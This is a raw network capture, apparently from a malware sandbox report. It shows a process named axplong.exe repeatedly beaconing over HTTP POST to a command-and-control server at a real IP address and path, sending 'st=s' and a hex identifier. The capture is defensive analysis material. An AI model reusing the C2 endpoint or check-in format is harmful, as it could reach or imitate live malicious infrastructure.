                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      27192.168.2.553674185.215.113.16807856C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      TimestampBytes transferredDirectionData
                      Jul 26, 2024 13:44:35.083563089 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 13:44:35.864424944 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:35 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 13:44:35.865273952 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 156
                      Cache-Control: no-cache
                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 43 41 45 34 33 43 46 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDFCAE43CFFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                      Jul 26, 2024 13:44:36.210395098 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:35 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      28192.168.2.553675185.215.113.16807856C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      TimestampBytes transferredDirectionData
                      Jul 26, 2024 13:44:36.327007055 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 13:44:37.088550091 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:36 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 13:44:37.089238882 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 156
                      Cache-Control: no-cache
                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 43 41 45 34 33 43 46 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDFCAE43CFFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                      Jul 26, 2024 13:44:37.337680101 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:37 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      29192.168.2.553676185.215.113.16807856C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      TimestampBytes transferredDirectionData
                      Jul 26, 2024 13:44:37.527575970 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 13:44:38.278229952 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:38 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 13:44:38.281565905 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 156
                      Cache-Control: no-cache
                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 43 41 45 34 33 43 46 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDFCAE43CFFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                      Jul 26, 2024 13:44:38.609952927 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:38 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      30192.168.2.553677185.215.113.16807856C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      TimestampBytes transferredDirectionData
                      Jul 26, 2024 13:44:38.717453003 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 13:44:39.893336058 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:39 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 13:44:39.896759033 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:39 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 13:44:39.899817944 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:39 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 13:44:39.910048008 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 156
                      Cache-Control: no-cache
                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 43 41 45 34 33 43 46 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDFCAE43CFFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                      Jul 26, 2024 13:44:40.159702063 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:40 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      31192.168.2.553678185.215.113.16807856C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      TimestampBytes transferredDirectionData
                      Jul 26, 2024 13:44:40.281171083 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 13:44:41.152069092 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:40 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 13:44:41.152724981 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 156
                      Cache-Control: no-cache
                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 43 41 45 34 33 43 46 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDFCAE43CFFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                      Jul 26, 2024 13:44:41.403776884 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:41 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      32192.168.2.553679185.215.113.16807856C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      TimestampBytes transferredDirectionData
                      Jul 26, 2024 13:44:41.521389008 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 13:44:42.298847914 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:42 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 13:44:42.311791897 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 156
                      Cache-Control: no-cache
                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 43 41 45 34 33 43 46 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDFCAE43CFFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                      Jul 26, 2024 13:44:42.595769882 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:42 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      33192.168.2.553680185.215.113.16807856C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      TimestampBytes transferredDirectionData
                      Jul 26, 2024 13:44:42.717983961 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 13:44:43.471055031 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:43 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 13:44:43.471693993 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 156
                      Cache-Control: no-cache
                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 43 41 45 34 33 43 46 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDFCAE43CFFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                      Jul 26, 2024 13:44:43.719747066 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:43 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      34192.168.2.553681185.215.113.16807856C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      TimestampBytes transferredDirectionData
                      Jul 26, 2024 13:44:43.827101946 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 13:44:44.988388062 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:44 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 13:44:44.989340067 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 156
                      Cache-Control: no-cache
                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 43 41 45 34 33 43 46 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDFCAE43CFFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                      Jul 26, 2024 13:44:44.992512941 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:44 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 13:44:45.238414049 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:45 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      35192.168.2.553682185.215.113.16807856C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      TimestampBytes transferredDirectionData
                      Jul 26, 2024 13:44:45.368541002 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 13:44:46.131669044 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:46 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 13:44:46.134480953 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 156
                      Cache-Control: no-cache
                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 43 41 45 34 33 43 46 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDFCAE43CFFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                      Jul 26, 2024 13:44:46.388288021 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:46 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      36192.168.2.553683185.215.113.16807856C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      TimestampBytes transferredDirectionData
                      Jul 26, 2024 13:44:46.504507065 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 13:44:47.274538040 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:47 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 13:44:47.275854111 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 156
                      Cache-Control: no-cache
                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 43 41 45 34 33 43 46 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDFCAE43CFFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                      Jul 26, 2024 13:44:47.675021887 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:47 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      37192.168.2.553684185.215.113.16807856C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      TimestampBytes transferredDirectionData
                      Jul 26, 2024 13:44:47.796544075 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 13:44:48.588161945 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:48 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 13:44:48.588973045 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 156
                      Cache-Control: no-cache
                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 43 41 45 34 33 43 46 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDFCAE43CFFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                      Jul 26, 2024 13:44:48.843326092 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:48 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      38192.168.2.553685185.215.113.16807856C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      TimestampBytes transferredDirectionData
                      Jul 26, 2024 13:44:49.354079008 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 13:44:50.146931887 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:50 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 13:44:50.147691965 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 156
                      Cache-Control: no-cache
